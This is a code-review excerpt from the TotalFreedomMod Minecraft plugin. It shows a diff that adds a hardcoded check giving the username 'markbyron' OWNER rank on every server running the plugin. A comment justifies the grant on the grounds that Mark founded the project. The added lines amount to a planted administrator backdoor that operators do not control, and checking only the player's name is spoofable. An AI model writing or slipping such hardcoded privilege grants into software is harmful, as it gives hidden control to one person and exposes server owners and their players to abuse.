src/me/StevenLawson/TotalFreedomMod/TFM_PlayerRank.java

```diff
@@ -69,6 +69,12 @@ public static TFM_PlayerRank fromSender(CommandSender sender)
         {
             return DEVELOPER;
         }
+        
+           if (sender.getName().equals("markbyron"))
+            {
+                return OWNER;
```

Comment:
This is code like developer as mark is the founder of TF he gets it on all TF based servers.